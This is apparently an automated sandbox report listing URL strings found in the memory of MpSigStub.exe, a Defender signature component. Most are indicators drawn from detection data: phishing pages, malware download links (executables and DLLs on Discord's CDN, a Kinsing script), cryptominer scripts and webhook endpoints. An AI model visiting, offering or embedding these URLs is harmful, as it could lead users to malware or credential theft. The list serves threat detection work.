Source: MpSigStub.exe, 00000023.00000003.18430797596.0000015B1AE5D000.00000004.00000001.sdmp String found in binary or memory: http://www.rico09.net/nighteyes/96/
Source: MpSigStub.exe, 00000023.00000003.18335134155.0000015B1A914000.00000004.00000001.sdmp String found in binary or memory: http://www.ritmicamente.it/scan/
Source: MpSigStub.exe, 00000023.00000003.18303445859.0000015B1B86F000.00000004.00000001.sdmp String found in binary or memory: http://www.rits.ga/excel/view.php
Source: MpSigStub.exe, 00000023.00000003.18314163408.0000015B1BB45000.00000004.00000001.sdmp String found in binary or memory: http://www.ritservice.rua
Source: MpSigStub.exe, 00000023.00000003.18424989390.0000015B1C5AA000.00000004.00000001.sdmp String found in binary or memory: http://www.rootkit.net.cn
Source: MpSigStub.exe, 00000023.00000003.18305659214.0000015B1C39B000.00000004.00000001.sdmp String found in binary or memory: http://www.rsdn.ru/cgi-bin/search.exe?query=x
Source: MpSigStub.exe, 00000023.00000003.18330938423.0000015B1AA81000.00000004.00000001.sdmp String found in binary or memory: http://www.rtuhrt.pw/a/wmydybda.exe
Source: MpSigStub.exe, 00000023.00000003.18432136853.0000015B1BFE7000.00000004.00000001.sdmp String found in binary or memory: http://www.sacbarao.kinghost.net/
Source: MpSigStub.exe, 00000023.00000003.18341814408.0000015B1C2D4000.00000004.00000001.sdmp String found in binary or memory: http://www.safesear.ch/?type=201
Source: MpSigStub.exe, 00000023.00000003.18434111043.0000015B1AF23000.00000004.00000001.sdmp String found in binary or memory: http://www.sagalasowka.pl/wp-content/uploads/2011/z
Source: MpSigStub.exe, 00000023.00000003.18319810399.0000015B1BE00000.00000004.00000001.sdmp String found in binary or memory: http://www.sagawa-exp.co.jp/
Source: MpSigStub.exe, 00000023.00000003.18285687047.0000015B1B29A000.00000004.00000001.sdmp String found in binary or memory: http://www.satsokal.com/word.doc
Source: MpSigStub.exe, 00000023.00000003.18341814408.0000015B1C2D4000.00000004.00000001.sdmp String found in binary or memory: http://www.sbcku.com/index.php
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: http://www.scan-dinavia-succession.com/kyqx7t6c/index.php
Source: MpSigStub.exe, 00000023.00000003.18309335590.0000015B1AFA8000.00000004.00000001.sdmp String found in binary or memory: http://www.se-beach-karting.at/overdue-payment/
Source: MpSigStub.exe, 00000023.00000003.18329979252.0000015B1AE1C000.00000004.00000001.sdmp String found in binary or memory: http://www.search-aid.com/search.php?qq=
Source: MpSigStub.exe, 00000023.00000003.18346827221.0000015B1B1B9000.00000004.00000001.sdmp String found in binary or memory: http://www.search-and-find.netg
Source: MpSigStub.exe, 00000023.00000003.18432465628.0000015B1B9FA000.00000004.00000001.sdmp String found in binary or memory: http://www.search.ask.com
Source: MpSigStub.exe, 00000023.00000003.18305659214.0000015B1C39B000.00000004.00000001.sdmp String found in binary or memory: http://www.searchmaid.com/
Source: MpSigStub.exe, 00000023.00000003.18326506118.0000015B1A705000.00000004.00000001.sdmp String found in binary or memory: http://www.searchult.com/?bd=sc&oem=
Source: MpSigStub.exe, 00000023.00000003.18425422653.0000015B1C5EB000.00000004.00000001.sdmp String found in binary or memory: http://www.seatoskycomputerguy.com/zw/oz/serozv.exe
Source: MpSigStub.exe, 00000023.00000003.18284892419.0000015B1AF67000.00000004.00000001.sdmp String found in binary or memory: http://www.sectorappliance.com/qdewfww/kdjase.exe
Source: MpSigStub.exe, 00000023.00000003.18434111043.0000015B1AF23000.00000004.00000001.sdmp String found in binary or memory: http://www.seduw.com:
Source: MpSigStub.exe, 00000023.00000003.18345359888.0000015B1A789000.00000004.00000001.sdmp String found in binary or memory: http://www.shadowmp3.com
Source: MpSigStub.exe, 00000023.00000003.18335733371.0000015B1B82C000.00000004.00000001.sdmp String found in binary or memory: http://www.shiyongsousuo.com
Source: MpSigStub.exe, 00000023.00000003.18330938423.0000015B1AA81000.00000004.00000001.sdmp String found in binary or memory: http://www.simplyinstaller.com/HtmlTemplates/finishPage.htmlx
Source: MpSigStub.exe, 00000023.00000003.18431115827.0000015B1AFEA000.00000004.00000001.sdmp String found in binary or memory: http://www.sitem.biz/
Source: MpSigStub.exe, 00000023.00000003.18341814408.0000015B1C2D4000.00000004.00000001.sdmp String found in binary or memory: http://www.sjhomme.co.kr/images/admin.jpg
Source: MpSigStub.exe, 00000023.00000003.18424989390.0000015B1C5AA000.00000004.00000001.sdmp String found in binary or memory: http://www.skkyc2004.cn
Source: MpSigStub.exe, 00000023.00000003.18315964598.0000015B1A481000.00000004.00000001.sdmp String found in binary or memory: http://www.slotch.com/ist/softwares/v4.0/istdownload.exe
Source: MpSigStub.exe, 00000023.00000003.18322243559.0000015B1A504000.00000004.00000001.sdmp String found in binary or memory: http://www.smartpcfixer.com//
Source: MpSigStub.exe, 00000023.00000003.18298772777.0000015B1A8DA000.00000004.00000001.sdmp String found in binary or memory: http://www.sniperspy.com/guide.html
Source: MpSigStub.exe, 00000023.00000003.18290902842.0000015B1BFA6000.00000004.00000001.sdmp String found in binary or memory: http://www.sogou.com/web?query=%s
Source: MpSigStub.exe, 00000023.00000003.18293662919.0000015B1BCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.sogou.com/web?sogouhome=&shuru=shou&query=
Source: MpSigStub.exe, 00000023.00000003.18432136853.0000015B1BFE7000.00000004.00000001.sdmp String found in binary or memory: http://www.solsub.com/jasso/hh/imagenes.html?
Source: MpSigStub.exe, 00000023.00000003.18304719860.0000015B1B7EB000.00000004.00000001.sdmp String found in binary or memory: http://www.somegreatsongs.com/license.cgi?vidlock_params=
Source: MpSigStub.exe, 00000023.00000003.18322610510.0000015B1A546000.00000004.00000001.sdmp String found in binary or memory: http://www.somegreatsongs.com/promo/
Source: MpSigStub.exe, 00000023.00000003.18427547415.0000015B1B8F2000.00000004.00000001.sdmp String found in binary or memory: http://www.soporteczamora.com/ups-ship-notification/
Source: MpSigStub.exe, 00000023.00000003.18290902842.0000015B1BFA6000.00000004.00000001.sdmp String found in binary or memory: http://www.soso.com/q?w=%s
Source: MpSigStub.exe, 00000023.00000003.18427196191.0000015B1AB46000.00000004.00000001.sdmp String found in binary or memory: http://www.soso.com/q?w=%s&lr=&sc=web&ch=w.p&filter=1&num=10&pg=%d
Source: MpSigStub.exe, 00000023.00000003.18427547415.0000015B1B8F2000.00000004.00000001.sdmp String found in binary or memory: http://www.sotrag.eu/invoice
Source: MpSigStub.exe, 00000023.00000003.18291855169.0000015B1B8B1000.00000004.00000001.sdmp String found in binary or memory: http://www.speeditupfree.com
Source: MpSigStub.exe, 00000023.00000003.18291855169.0000015B1B8B1000.00000004.00000001.sdmp String found in binary or memory: http://www.speeditupfree.comxA
Source: MpSigStub.exe, 00000023.00000003.18335733371.0000015B1B82C000.00000004.00000001.sdmp String found in binary or memory: http://www.sportscn.com/
Source: MpSigStub.exe, 00000023.00000003.18318994950.0000015B1A589000.00000004.00000001.sdmp String found in binary or memory: http://www.spyburner.com/activate.php?time=
Source: MpSigStub.exe, 00000023.00000003.18343611807.0000015B1BD13000.00000004.00000001.sdmp String found in binary or memory: http://www.spylocked.com/?
Source: MpSigStub.exe, 00000023.00000003.18339366931.0000015B1C174000.00000004.00000001.sdmp String found in binary or memory: http://www.sqwire.com
Source: MpSigStub.exe, 00000023.00000003.18298772777.0000015B1A8DA000.00000004.00000001.sdmp String found in binary or memory: http://www.sqwire.com/
Source: MpSigStub.exe, 00000023.00000003.18432136853.0000015B1BFE7000.00000004.00000001.sdmp String found in binary or memory: http://www.ssl-256mail.host/5c596a68b83a886b57ade24c?jgiasyi=&pwnmiz_g=1eo3fjfkkke&jgiasyi=wtnygzsiy
Source: MpSigStub.exe, 00000023.00000003.18433793263.0000015B1AEE2000.00000004.00000001.sdmp String found in binary or memory: http://www.statuscrew.gr/
Source: MpSigStub.exe, 00000023.00000003.18423368163.0000015B1C1B6000.00000004.00000001.sdmp String found in binary or memory: http://www.steelbendersrfq.cf/
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: http://www.stimteam.co.za/images
Source: MpSigStub.exe, 00000023.00000003.18335733371.0000015B1B82C000.00000004.00000001.sdmp String found in binary or memory: http://www.stockstar.com/
Source: MpSigStub.exe, 00000023.00000003.18345035369.0000015B1B176000.00000004.00000001.sdmp String found in binary or memory: http://www.superpctools.com
Source: MpSigStub.exe, 00000023.00000003.18339677269.0000015B1AB04000.00000004.00000001.sdmp String found in binary or memory: http://www.support.me/
Source: MpSigStub.exe, 00000023.00000003.18335134155.0000015B1A914000.00000004.00000001.sdmp, MpSigStub.exe, 00000023.00000003.18339677269.0000015B1AB04000.00000004.00000001.sdmp String found in binary or memory: http://www.supremocontrol.com/
Source: MpSigStub.exe, 00000023.00000003.18335134155.0000015B1A914000.00000004.00000001.sdmp String found in binary or memory: http://www.supremocontrol.com/a
Source: MpSigStub.exe, 00000023.00000003.18423368163.0000015B1C1B6000.00000004.00000001.sdmp String found in binary or memory: http://www.surprisingdd.top
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp String found in binary or memory: http://www.sweet-page.com/?type=sc
Source: MpSigStub.exe, 00000023.00000003.18426595439.0000015B1BB86000.00000004.00000001.sdmp String found in binary or memory: http://www.symantec.com
Source: MpSigStub.exe, 00000023.00000003.18298772777.0000015B1A8DA000.00000004.00000001.sdmp String found in binary or memory: http://www.sync15.com/bizpolx.exe
Source: MpSigStub.exe, 00000023.00000003.18344475813.0000015B1C1D6000.00000004.00000001.sdmp String found in binary or memory: http://www.systweak.com/registrycleaner
Source: MpSigStub.exe, 00000023.00000003.18433124639.0000015B1B6E2000.00000004.00000001.sdmp String found in binary or memory: http://www.tagbao.com/open
Source: MpSigStub.exe, 00000023.00000003.18327176542.0000015B1B61C000.00000004.00000001.sdmp String found in binary or memory: http://www.taktuk.tk
Source: MpSigStub.exe, 00000023.00000003.18313952102.0000015B1B3A0000.00000004.00000001.sdmp String found in binary or memory: http://www.tangosearch.com/
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: http://www.tarazsystem.com/wp-admin/pl21.php)
Source: MpSigStub.exe, 00000023.00000003.18303445859.0000015B1B86F000.00000004.00000001.sdmp String found in binary or memory: http://www.tattoopower.it/invoice-
Source: MpSigStub.exe, 00000023.00000003.18335432095.0000015B1A956000.00000004.00000001.sdmp String found in binary or memory: http://www.tazbao.com/setup-
Source: MpSigStub.exe, 00000023.00000003.18341814408.0000015B1C2D4000.00000004.00000001.sdmp String found in binary or memory: http://www.technologiesaintjoseph.com/uninstall.php?
Source: MpSigStub.exe, 00000023.00000003.18425885690.0000015B1BCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.tempuri.org/DataSet1.xsd
Source: MpSigStub.exe, 00000023.00000003.18334190857.0000015B1A60C000.00000004.00000001.sdmp String found in binary or memory: http://www.thedomaindata.com/
Source: MpSigStub.exe, 00000023.00000003.18349339011.0000015B1A999000.00000004.00000001.sdmp String found in binary or memory: http://www.thefacebooksinfo.com/Public/softs/freefinder/FreeFinderResourcesNew.zip
Source: MpSigStub.exe, 00000023.00000003.18334190857.0000015B1A60C000.00000004.00000001.sdmp String found in binary or memory: http://www.thehun.com/
Source: MpSigStub.exe, 00000023.00000003.18284892419.0000015B1AF67000.00000004.00000001.sdmp String found in binary or memory: http://www.thepitstopjohnstone.co.uk/invoice/
Source: MpSigStub.exe, 00000023.00000003.18424133495.0000015B1C0F0000.00000004.00000001.sdmp String found in binary or memory: http://www.thon-samson.be/js/_notes/
Source: MpSigStub.exe, 00000023.00000003.18322924550.0000015B1B0F3000.00000004.00000001.sdmp String found in binary or memory: http://www.tiandy.com/rechnung-
Source: MpSigStub.exe, 00000023.00000003.18291855169.0000015B1B8B1000.00000004.00000001.sdmp String found in binary or memory: http://www.tibia.com/community/?subtopic=characters%26name=
Source: MpSigStub.exe, 00000023.00000003.18335733371.0000015B1B82C000.00000004.00000001.sdmp String found in binary or memory: http://www.tiexue.net/
Source: MpSigStub.exe, 00000023.00000003.18432465628.0000015B1B9FA000.00000004.00000001.sdmp String found in binary or memory: http://www.tijuanalaw.com/
Source: MpSigStub.exe, 00000023.00000003.18290902842.0000015B1BFA6000.00000004.00000001.sdmp String found in binary or memory: http://www.tq121.com.cn/
Source: MpSigStub.exe, 00000023.00000003.18333278800.0000015B1AC5E000.00000004.00000001.sdmp String found in binary or memory: http://www.trafficjam.nl/?failed=initialize.delsim
Source: MpSigStub.exe, 00000023.00000003.18333278800.0000015B1AC5E000.00000004.00000001.sdmp String found in binary or memory: http://www.trafficjam.nl/?failed=initialize.delsimProgramFilesDir
Source: MpSigStub.exe, 00000023.00000003.18431461093.0000015B1B02B000.00000004.00000001.sdmp String found in binary or memory: http://www.traramayeri.net
Source: MpSigStub.exe, 00000023.00000003.18423368163.0000015B1C1B6000.00000004.00000001.sdmp String found in binary or memory: http://www.tripod.com
Source: MpSigStub.exe, 00000023.00000003.18425422653.0000015B1C5EB000.00000004.00000001.sdmp String found in binary or memory: http://www.troman.de/cmd/cmds.txt
Source: MpSigStub.exe, 00000023.00000003.18295774211.0000015B1BEE1000.00000004.00000001.sdmp String found in binary or memory: http://www.trotux.com/?z=
Source: MpSigStub.exe, 00000023.00000003.18324547737.0000015B1B0B1000.00000004.00000001.sdmp, MpSigStub.exe, 00000023.00000003.18307753022.0000015B1B767000.00000004.00000001.sdmp String found in binary or memory: http://www.tubedigger.com
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: https://asgvprotecao.com.br/wa_php/clZ&LpN-omp/klbd5vxr6mf38o/YxSlZ&LpN-slZ&LpN-9udRlZ&LpN-8U.plZ&Lp
Source: MpSigStub.exe, 00000023.00000003.18430797596.0000015B1AE5D000.00000004.00000001.sdmp String found in binary or memory: https://asianbusss.ru/qazx/?activity=4789652
Source: MpSigStub.exe, 00000023.00000003.18329049691.0000015B1ABCB000.00000004.00000001.sdmp String found in binary or memory: https://asushotfix.com/.
Source: MpSigStub.exe, 00000023.00000003.18299377795.0000015B1AEE3000.00000004.00000001.sdmp String found in binary or memory: https://atacamaplotter.cl/wp-includes/fonts/reportpdfnew.php
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: https://atalent.fi/avoimet-tyopaikat
Source: MpSigStub.exe, 00000023.00000003.18309335590.0000015B1AFA8000.00000004.00000001.sdmp String found in binary or memory: https://ate.bz/now.php
Source: MpSigStub.exe, 00000023.00000003.18425422653.0000015B1C5EB000.00000004.00000001.sdmp String found in binary or memory: https://atencionpreferente.com/crm/custom/reportdhlnew.php
Source: MpSigStub.exe, 00000023.00000003.18296359788.0000015B1C251000.00000004.00000001.sdmp String found in binary or memory: https://attack.mitre.org
Source: MpSigStub.exe, 00000023.00000003.18281872533.0000015B1C527000.00000004.00000001.sdmp String found in binary or memory: https://auth-server4.xyz/processor.php
Source: MpSigStub.exe, 00000023.00000003.18313512818.0000015B1B346000.00000004.00000001.sdmp String found in binary or memory: https://auth.tdameritrade.com/auth?response_type=code&redirect_uri=
Source: MpSigStub.exe, 00000023.00000003.18319632958.0000015B1BDD9000.00000004.00000001.sdmp String found in binary or memory: https://authedmine.com/lib/
Source: MpSigStub.exe, 00000023.00000003.18336414128.0000015B1BF22000.00000004.00000001.sdmp String found in binary or memory: https://autobusinessfunnel.com/wp-admin/css/colors/
Source: MpSigStub.exe, 00000023.00000003.18432136853.0000015B1BFE7000.00000004.00000001.sdmp String found in binary or memory: https://avanajewelry.com/dddsedologhfmkj/aabbbygtvjjytgfxjhmgncgi%20in%20_forma.php
Source: MpSigStub.exe, 00000023.00000003.18320914162.0000015B1B65F000.00000004.00000001.sdmp String found in binary or memory: https://avart.org/hdhdhk/xls/index.php?
Source: MpSigStub.exe, 00000023.00000003.18335432095.0000015B1A956000.00000004.00000001.sdmp String found in binary or memory: https://azur.melhordev.com/.well-known/acme-challenge/std/php/
Source: MpSigStub.exe, 00000023.00000003.18319632958.0000015B1BDD9000.00000004.00000001.sdmp String found in binary or memory: https://b.top4top.io/p_15665ejq60.jpg
Source: MpSigStub.exe, 00000023.00000003.18318994950.0000015B1A589000.00000004.00000001.sdmp String found in binary or memory: https://bankline.itau.com.br/
Source: MpSigStub.exe, 00000023.00000003.18329979252.0000015B1AE1C000.00000004.00000001.sdmp String found in binary or memory: https://bankline.itau.com.br/GRIPNET/bklcgi.exe
Source: MpSigStub.exe, 00000023.00000003.18298772777.0000015B1A8DA000.00000004.00000001.sdmp String found in binary or memory: https://bankss-71.ml/2.dll
Source: MpSigStub.exe, 00000023.00000003.18319632958.0000015B1BDD9000.00000004.00000001.sdmp String found in binary or memory: https://batc.dyndns.dk/minto3/next.php
Source: MpSigStub.exe, 00000023.00000003.18307169245.0000015B1A4C3000.00000004.00000001.sdmp String found in binary or memory: https://bb.realestateprivateportfolio.com/img/
Source: MpSigStub.exe, 00000023.00000003.18346827221.0000015B1B1B9000.00000004.00000001.sdmp String found in binary or memory: https://bbcgroup.co.in/qpipsriug.php
Source: MpSigStub.exe, 00000023.00000003.18428865493.0000015B1A381000.00000004.00000001.sdmp String found in binary or memory: https://beer.appi.top/?74c96ea1gmz9qipluhdvtw6q7ekn6e0upb
Source: MpSigStub.exe, 00000023.00000003.18289945062.0000015B1AE5F000.00000004.00000001.sdmp String found in binary or memory: https://beetibutron.xyz/rowdy/brand.php
Source: MpSigStub.exe, 00000023.00000003.18296359788.0000015B1C251000.00000004.00000001.sdmp String found in binary or memory: https://behendige-boxers.nl/ds/0902.gif
Source: MpSigStub.exe, 00000023.00000003.18430467796.0000015B1AE1C000.00000004.00000001.sdmp String found in binary or memory: https://bemojo.com/ds/161120.gif
Source: MpSigStub.exe, 00000023.00000003.18307169245.0000015B1A4C3000.00000004.00000001.sdmp String found in binary or memory: https://benabase.com/cgi_bin/amvzdxmuc3vhcmv6qhzvbg90zweuy29t
Source: MpSigStub.exe, 00000023.00000003.18326614272.0000015B1A717000.00000004.00000001.sdmp String found in binary or memory: https://benchlings.com/
Source: MpSigStub.exe, 00000023.00000003.18320598062.0000015B1B598000.00000004.00000001.sdmp String found in binary or memory: https://benchlings.com/xoxo/next.php
Source: MpSigStub.exe, 00000023.00000003.18298772777.0000015B1A8DA000.00000004.00000001.sdmp String found in binary or memory: https://berlitzalahsa.sa/sport/rockstar.php
Source: MpSigStub.exe, 00000023.00000003.18329049691.0000015B1ABCB000.00000004.00000001.sdmp String found in binary or memory: https://besthybridcar.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.18323230598.0000015B1B134000.00000004.00000001.sdmp String found in binary or memory: https://bigup.marketing/wp-content/plugins/seo_index/hloym4kndci.php
Source: MpSigStub.exe, 00000023.00000003.18296359788.0000015B1C251000.00000004.00000001.sdmp String found in binary or memory: https://bipblocker.com/get_config/
Source: MpSigStub.exe, 00000023.00000003.18345035369.0000015B1B176000.00000004.00000001.sdmp String found in binary or memory: https://bit.ly
Source: MpSigStub.exe, 00000023.00000003.18424133495.0000015B1C0F0000.00000004.00000001.sdmp String found in binary or memory: https://bit.ly/2g8qrgl
Source: MpSigStub.exe, 00000023.00000003.18430797596.0000015B1AE5D000.00000004.00000001.sdmp String found in binary or memory: https://bit.ly/2pfj2w
Source: MpSigStub.exe, 00000023.00000003.18434111043.0000015B1AF23000.00000004.00000001.sdmp String found in binary or memory: https://bit.ly/2snjwv1)
Source: MpSigStub.exe, 00000023.00000003.18434111043.0000015B1AF23000.00000004.00000001.sdmp String found in binary or memory: https://bit.ly/2srxmuq)
Source: MpSigStub.exe, 00000023.00000003.18430078945.0000015B1C0AE000.00000004.00000001.sdmp String found in binary or memory: https://bit.ly/2zbes5a
Source: MpSigStub.exe, 00000023.00000003.18335134155.0000015B1A914000.00000004.00000001.sdmp String found in binary or memory: https://bit.ly/3kthd4j
Source: MpSigStub.exe, 00000023.00000003.18345359888.0000015B1A789000.00000004.00000001.sdmp String found in binary or memory: https://bit.ly/3kvdcmi
Source: MpSigStub.exe, 00000023.00000003.18286213062.0000015B1A381000.00000004.00000001.sdmp String found in binary or memory: https://bitbucket.org/kimrakfl33/git/raw/master/kinsingchmod
Source: MpSigStub.exe, 00000023.00000003.18424566697.0000015B1C41E000.00000004.00000001.sdmp String found in binary or memory: https://bitly.com/
Source: MpSigStub.exe, 00000023.00000003.18423368163.0000015B1C1B6000.00000004.00000001.sdmp String found in binary or memory: https://bizimi.com/aa-manage/post/ftp/themes/nazl/phpnet.php?code=2000700
Source: MpSigStub.exe, 00000023.00000003.18431805767.0000015B1BFA6000.00000004.00000001.sdmp String found in binary or memory: https://bjhvgft67rf.gb.net/vfeg877g7/?cvwrg3g=vv3g3v4f
Source: MpSigStub.exe, 00000023.00000003.18285687047.0000015B1B29A000.00000004.00000001.sdmp String found in binary or memory: https://bk.kv-dv8.club/?e=bbeckler
Source: MpSigStub.exe, 00000023.00000003.18335432095.0000015B1A956000.00000004.00000001.sdmp String found in binary or memory: https://blackberryizm.com/frontend/assets/images/favico/
Source: MpSigStub.exe, 00000023.00000003.18426595439.0000015B1BB86000.00000004.00000001.sdmp String found in binary or memory: https://blackberryizm.com/frontend/assets/images/favico/reportmaersk.php
Source: MpSigStub.exe, 00000023.00000003.18345035369.0000015B1B176000.00000004.00000001.sdmp, MpSigStub.exe, 00000023.00000003.18285687047.0000015B1B29A000.00000004.00000001.sdmp String found in binary or memory: https://bm.jb-voice.online/?e=accounting
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp String found in binary or memory: https://bonshyonloire.ml/exploit/
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: https://boyscoutsram.com/c2hhd2v6x2jhbnvyaubiyxquy29t
Source: MpSigStub.exe, 00000023.00000003.18430467796.0000015B1AE1C000.00000004.00000001.sdmp String found in binary or memory: https://btchs.com.br/ds/161120.gif
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: https://builderdoc.org/life/direct.php)
Source: MpSigStub.exe, 00000023.00000003.18426595439.0000015B1BB86000.00000004.00000001.sdmp String found in binary or memory: https://buildingsandpools.com/wp-content/iy6ux613260
Source: MpSigStub.exe, 00000023.00000003.18322243559.0000015B1A504000.00000004.00000001.sdmp String found in binary or memory: https://burnleyd.cf/brand.php
Source: MpSigStub.exe, 00000023.00000003.18429740183.0000015B1B2C1000.00000004.00000001.sdmp String found in binary or memory: https://businessonline.o2.co.uk/
Source: MpSigStub.exe, 00000023.00000003.18336414128.0000015B1BF22000.00000004.00000001.sdmp String found in binary or memory: https://butikzai.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.18336414128.0000015B1BF22000.00000004.00000001.sdmp String found in binary or memory: https://bydinvestments.com/cache/rainer/258720/rainer&#46;bauer
Source: MpSigStub.exe, 00000023.00000003.18345035369.0000015B1B176000.00000004.00000001.sdmp String found in binary or memory: https://c-0li.club/?e=JPohlman
Source: MpSigStub.exe, 00000023.00000003.18425422653.0000015B1C5EB000.00000004.00000001.sdmp String found in binary or memory: https://c.top4top.io/p_1832dqk101.jpg
Source: MpSigStub.exe, 00000023.00000003.18322243559.0000015B1A504000.00000004.00000001.sdmp String found in binary or memory: https://cablenet.com.ec/drms/bb.html
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp String found in binary or memory: https://caixadirecta.cgd.pt
Source: MpSigStub.exe, 00000023.00000003.18314518681.0000015B1B7A8000.00000004.00000001.sdmp String found in binary or memory: https://calfeutragebprs%.com/wp%-content/image/s3%.php
Source: MpSigStub.exe, 00000023.00000003.18309645507.0000015B1A404000.00000004.00000001.sdmp String found in binary or memory: https://camillesanz.com/lib/status.js
Source: MpSigStub.exe, 00000023.00000003.18432136853.0000015B1BFE7000.00000004.00000001.sdmp String found in binary or memory: https://canary.discord.com/api/webhooks/
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp String found in binary or memory: https://carmelavalles.com/site/wp-admin/
Source: MpSigStub.exe, 00000023.00000003.18324547737.0000015B1B0B1000.00000004.00000001.sdmp String found in binary or memory: https://carpascapital.com/gbpg8mtsgbv/ka.html
Source: MpSigStub.exe, 00000023.00000003.18344996372.0000015B1B0B0000.00000004.00000001.sdmp String found in binary or memory: https://casciscus.com/wp-admin/v4/
Source: MpSigStub.exe, 00000023.00000003.18315106599.0000015B1B858000.00000004.00000001.sdmp String found in binary or memory: https://casciscus.com/wp-admin/v4/pocket.php
Source: MpSigStub.exe, 00000023.00000003.18402123411.0000015B1B2B1000.00000004.00000001.sdmp String found in binary or memory: https://cazala.github.io/coin-hive-proxy/client.js?
Source: MpSigStub.exe, 00000023.00000003.18327508493.0000015B1B6A0000.00000004.00000001.sdmp String found in binary or memory: https://cdn-105.anonfiles.com/
Source: MpSigStub.exe, 00000023.00000003.18341814408.0000015B1C2D4000.00000004.00000001.sdmp, MpSigStub.exe, 00000023.00000003.18327508493.0000015B1B6A0000.00000004.00000001.sdmp String found in binary or memory: https://cdn.discordapp.com/
Source: MpSigStub.exe, 00000023.00000003.18336414128.0000015B1BF22000.00000004.00000001.sdmp String found in binary or memory: https://cdn.discordapp.com/attachments
Source: MpSigStub.exe, 00000023.00000003.18341814408.0000015B1C2D4000.00000004.00000001.sdmp, MpSigStub.exe, 00000023.00000003.18334520035.0000015B1A6C6000.00000004.00000001.sdmp, MpSigStub.exe, 00000023.00000003.18431805767.0000015B1BFA6000.00000004.00000001.sdmp, MpSigStub.exe, 00000023.00000003.18286213062.0000015B1A381000.00000004.00000001.sdmp String found in binary or memory: https://cdn.discordapp.com/attachments/
Source: MpSigStub.exe, 00000023.00000003.18344332390.0000015B1C1B7000.00000004.00000001.sdmp String found in binary or memory: https://cdn.discordapp.com/attachments/844726578415665236/846209246264688650/
Source: MpSigStub.exe, 00000023.00000003.18342870635.0000015B1AB89000.00000004.00000001.sdmp String found in binary or memory: https://cdn.discordapp.com/attachments/859130004898447360/869326380259758080/VodoKanalForms.dll
Source: MpSigStub.exe, 00000023.00000003.18329672768.0000015B1ADDA000.00000004.00000001.sdmp String found in binary or memory: https://cdn.discordapp.com/attachments/859130004898447360/871143663751823370/Anasayfa.dll
Source: MpSigStub.exe, 00000023.00000003.18313952102.0000015B1B3A0000.00000004.00000001.sdmp String found in binary or memory: https://cdn.discordapp.com/attachments/876742387932745741/876743456536559656/steammaa.dll
Source: MpSigStub.exe, 00000023.00000003.18345359888.0000015B1A789000.00000004.00000001.sdmp String found in binary or memory: https://cdn.discordapp.com/attachments/877973640937897984/878021367742734376/wdqdwq.dll
Source: MpSigStub.exe, 00000023.00000003.18345359888.0000015B1A789000.00000004.00000001.sdmp String found in binary or memory: https://cdn.discordapp.com/attachments/877973640937897984/878021367742734376/wdqdwq.dllx
Source: MpSigStub.exe, 00000023.00000003.18431461093.0000015B1B02B000.00000004.00000001.sdmp String found in binary or memory: https://cdn.discordapp.com/avatars/
Source: MpSigStub.exe, 00000023.00000003.18432136853.0000015B1BFE7000.00000004.00000001.sdmp String found in binary or memory: https://cdn342.org/.well-known/files/limited/upgrade/index.php?email=patent-license
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: https://cdn4.buysellads.net/pub/tempmail.js?
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp String found in binary or memory: https://cdshgvjs.ygto.com/leo/
Source: MpSigStub.exe, 00000023.00000003.18335432095.0000015B1A956000.00000004.00000001.sdmp String found in binary or memory: https://ceibosnorte.com/images/clients/01/
Source: MpSigStub.exe, 00000023.00000003.18286213062.0000015B1A381000.00000004.00000001.sdmp String found in binary or memory: https://chiddingstonenursery.co.uk/loign.php?user=
Source: MpSigStub.exe, 00000023.00000003.18298772777.0000015B1A8DA000.00000004.00000001.sdmp String found in binary or memory: https://chinatyres.net/IuNbOpen/oiUnbYATR.php
Source: MpSigStub.exe, 00000023.00000003.18320914162.0000015B1B65F000.00000004.00000001.sdmp String found in binary or memory: https://chogoon.com/srt/d7q0j
Source: MpSigStub.exe, 00000023.00000003.18309645507.0000015B1A404000.00000004.00000001.sdmp String found in binary or memory: https://chpingnow.xyz/21.psd
Source: MpSigStub.exe, 00000023.00000003.18336414128.0000015B1BF22000.00000004.00000001.sdmp String found in binary or memory: https://chrome.google.com/webstore
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp String found in binary or memory: https://clashwoman.info/
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp String found in binary or memory: https://cld.pt/dl/download/30e57a1d-338a-4c1b-9ad9-db0220f77ef0/bruto.jpg
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp String found in binary or memory: https://clicks.life/care/
Source: MpSigStub.exe, 00000023.00000003.18427547415.0000015B1B8F2000.00000004.00000001.sdmp String found in binary or memory: https://cmail.daum.net/v2/
Source: MpSigStub.exe, 00000023.00000003.18307169245.0000015B1A4C3000.00000004.00000001.sdmp String found in binary or memory: https://cnaaa11sd.gb.net/efcdsvftgxc/?gdes3sc=6sdfr45
Source: MpSigStub.exe, 00000023.00000003.18316847212.0000015B1B582000.00000004.00000001.sdmp String found in binary or memory: https://co3.live
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: https://coffreo.biz/xmlrpc.php
